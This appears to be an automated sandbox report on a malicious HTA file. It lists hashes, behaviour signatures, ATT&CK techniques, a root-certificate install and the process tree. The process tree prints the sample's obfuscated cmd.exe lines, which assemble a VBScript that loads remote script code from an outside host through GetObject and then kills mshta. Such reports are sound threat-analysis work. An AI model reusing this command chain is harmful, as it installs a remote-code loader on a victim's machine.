91ecdf343eb27fe5e920303f37e840c57ca75d88d7b04442b746b0bde24bded4

Analysis

max time kernel
120s
max time network
121s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
01-10-2024 14:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

_.hta
Size

139B
MD5

8c839bd7e5ecf03fc547750e1c00d748
SHA1

4d7ea50af88e422e4487e3e88a3dcced28ce7af1
SHA256

91ecdf343eb27fe5e920303f37e840c57ca75d88d7b04442b746b0bde24bded4
SHA512

7ec7416e52d59363112f27f431edc5c6694e937262665dcb1b2311d68a362c4e3c6e0952efef99917dbbe90d0862ade58410b1fde05ca36b635b614c98c158f9

Score

8^/10

discovery

Malware Config

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
4	824	mshta.exe
7	824	mshta.exe
9	824	mshta.exe
11	1340	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
540	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	mshta.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	540	taskkill.exe

Suspicious use of WriteProcessMemory 40 IoCs

description	pid	Process	procid_target
PID 824 wrote to memory of 1200	824	mshta.exe	31
PID 824 wrote to memory of 1200	824	mshta.exe	31
PID 824 wrote to memory of 1200	824	mshta.exe	31
PID 824 wrote to memory of 1200	824	mshta.exe	31
PID 824 wrote to memory of 2628	824	mshta.exe	33
PID 824 wrote to memory of 2628	824	mshta.exe	33
PID 824 wrote to memory of 2628	824	mshta.exe	33
PID 824 wrote to memory of 2628	824	mshta.exe	33
PID 2628 wrote to memory of 2580	2628	cmd.exe	35
PID 2628 wrote to memory of 2580	2628	cmd.exe	35
PID 2628 wrote to memory of 2580	2628	cmd.exe	35
PID 2628 wrote to memory of 2580	2628	cmd.exe	35
PID 2628 wrote to memory of 2588	2628	cmd.exe	36
PID 2628 wrote to memory of 2588	2628	cmd.exe	36
PID 2628 wrote to memory of 2588	2628	cmd.exe	36
PID 2628 wrote to memory of 2588	2628	cmd.exe	36
PID 2628 wrote to memory of 2648	2628	cmd.exe	37
PID 2628 wrote to memory of 2648	2628	cmd.exe	37
PID 2628 wrote to memory of 2648	2628	cmd.exe	37
PID 2628 wrote to memory of 2648	2628	cmd.exe	37
PID 2628 wrote to memory of 2740	2628	cmd.exe	38
PID 2628 wrote to memory of 2740	2628	cmd.exe	38
PID 2628 wrote to memory of 2740	2628	cmd.exe	38
PID 2628 wrote to memory of 2740	2628	cmd.exe	38
PID 824 wrote to memory of 1776	824	mshta.exe	39
PID 824 wrote to memory of 1776	824	mshta.exe	39
PID 824 wrote to memory of 1776	824	mshta.exe	39
PID 824 wrote to memory of 1776	824	mshta.exe	39
PID 824 wrote to memory of 264	824	mshta.exe	41
PID 824 wrote to memory of 264	824	mshta.exe	41
PID 824 wrote to memory of 264	824	mshta.exe	41
PID 824 wrote to memory of 264	824	mshta.exe	41
PID 264 wrote to memory of 1340	264	cmd.exe	43
PID 264 wrote to memory of 1340	264	cmd.exe	43
PID 264 wrote to memory of 1340	264	cmd.exe	43
PID 264 wrote to memory of 1340	264	cmd.exe	43
PID 1340 wrote to memory of 540	1340	WScript.exe	45
PID 1340 wrote to memory of 540	1340	WScript.exe	45
PID 1340 wrote to memory of 540	1340	WScript.exe	45
PID 1340 wrote to memory of 540	1340	WScript.exe	45

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\_.hta"
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:824
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /V/D/c "echo B954i4="ri">C:\Users\Public\xmLN96.vbs&&echo HSqyC933="tp">>C:\Users\Public\xmLN96.vbs&&echo dkKic72=".":cCdiD66="sC" ^& B954i4 ^& "pt:ht" ^& HSqyC933 ^& "s://">>C:\Users\Public\xmLN96.vbs"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1200
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /V/D/c echo|set /p=^"cCdiD66^=cCdiD66 ^& ^"220"+dkKic72+"240"+dkKic72+"109"+dkKic72+"208"+dkKic72+"host"+dkKic72+"secureserver"+dkKic72+"net/g1^":GetO^">>C:\Users\Public\\xmLN96.vbs&echo|set /p=^"bject(^">>C:\Users\Public\\xmLN96.vbs
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2580
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" set /p="cCdiD66=cCdiD66 & "220"+dkKic72+"240"+dkKic72+"109"+dkKic72+"208"+dkKic72+"host"+dkKic72+"secureserver"+dkKic72+"net/g1":GetO" 1>>C:\Users\Public\\xmLN96.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" set /p="bject(" 1>>C:\Users\Public\\xmLN96.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2740
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /V/D/c "echo _>>C:\Users\Public\\xmLN96.vbs&&echo cCdiD66)>>C:\Users\Public\\xmLN96.vbs"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1776
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\\xmLN96.vbs
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:264
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Public\xmLN96.vbs"
    3⤵
    - Blocklisted process makes network request
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1340
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /F /IM mshta.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:540

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

Filesize
717B

MD5
822467b728b7a66b081c91795373789a

SHA1
d8f2f02e1eef62485a9feffd59ce837511749865

SHA256
af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

SHA512
bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4A9F38DF82B26D00559DDE1B324CEFE0

Filesize
504B

MD5
702336d6621b62268ad66e7f82e9546b

SHA1
a277a3a1a574ad4c5610d548dece7affa9a59b75

SHA256
22718e334d4ecd12c703958db022888e890643a211d2c8dc6f265d8032245ad6

SHA512
6496a109c3f258d59cdd850ad408baebf1bbda817a30ef22e63eae7d02a63914d0ed22f3fb6c6790da12e0f7007eaf78fd739df16cc48d55aa929b9414c15fcc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

Filesize
192B

MD5
7a97a826d7b9972eb55ece416e8d9482

SHA1
d064c1129e87084486be1c49f818524f4a962484

SHA256
20d333ba17af919bdcaf2c2f3081a26dcab6d37ff6b3a5504d036d98925e4d36

SHA512
ee6900255623fd5de0ed8ed0ae7d72f45c6566f711ed1973cf28801394b9862b220e9f11528fa9cd10a22e149bd092c3dbbfd1d1ed7208cb05fd005e9da8419c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4A9F38DF82B26D00559DDE1B324CEFE0

Filesize
546B

MD5
fb43f184986c15ff921d165d1a79f748

SHA1
706128dbf3b4ecb259e641ac3f991b987a46e8f4

SHA256
0e0b1c41cc6b92e88ebed81a9dd475b14f327f4625cf6a673f0b10c494ee4db1

SHA512
c3fc00a914f06012e02fec170cfb15fdf560b1fb99ace5c6e6e6988c69f55adb603c58aef1f7833b71393901a47b94aaaf4f8be81d8d75220b00ca70e5e84d9e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
094d194a181535b843d3ab157f338829

SHA1
2ba6095504c77a157b418b65a56538e768db52bb

SHA256
3e58c806a3eccca7bb9799290af364e11a4f12daef653a71a08be5137cc261aa

SHA512
43123d70b5299205bbd0977c5e26d81a4fd13cc9282ac0a8e88c611028c2aa88585136dd1b112f802350122e16179bfbf1750a23a8c393bb86846dcc5b71ee01

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabEBA6.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Public\xmLN96.vbs

Filesize
93B

MD5
81ddbd785af174e15afa6790f7b9bb94

SHA1
b7d1436055ac4cfff8e1f83698dfc3ce27915913

SHA256
722eecfb22e17ca42388ab3243cb289deff3af1a81a202a57bba3a641a5dd2df

SHA512
c3aef81683b6b4538dffa839b44ee7f3a038cf7f720584935facc68fd1b1797c8e4085af0d811a9ef1bf10b37b60756be2f9e22b2f107b9f7b1835585b01a02d

Download Submit
C:\Users\Public\xmLN96.vbs

Filesize
218B

MD5
4eb328470ff6631c17aac478962e25b7

SHA1
b50fb58bfb796184520d8ce2d81fa6a91c28f04c

SHA256
eccf23d11e8a7b86111e58dce8e11bb3af9becbd0aaf712ceecd24b6a32f6dae

SHA512
ba5458d3f25bbcc56b22268e12ad195ef1ac90bf29008bd903fde6ad289dc5cf7e941b1ed07725d8afe1dc1ff543c5c2d9e1dda219da01bb9f78725d5cc510e6

Download Submit
C:\Users\Public\xmLN96.vbs

Filesize
237B

MD5
8f4886b5ba319152b919b224971c365b

SHA1
faa3dd28e3e04a3956ffc916d3d048f9fa09d9f8

SHA256
ed026b15a04fa56e2fb49fc9530284f283b889a5dd185c32689556c44e4ae6d2

SHA512
1e60310bb5ebd4f13c7646fa2d8a79c3119571a8deb3e16f69e409cbda6c2ff8bb7d08036c35f2a69b92d63c52bb381d9d1e4bb8333829d545a8e286da94d507

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads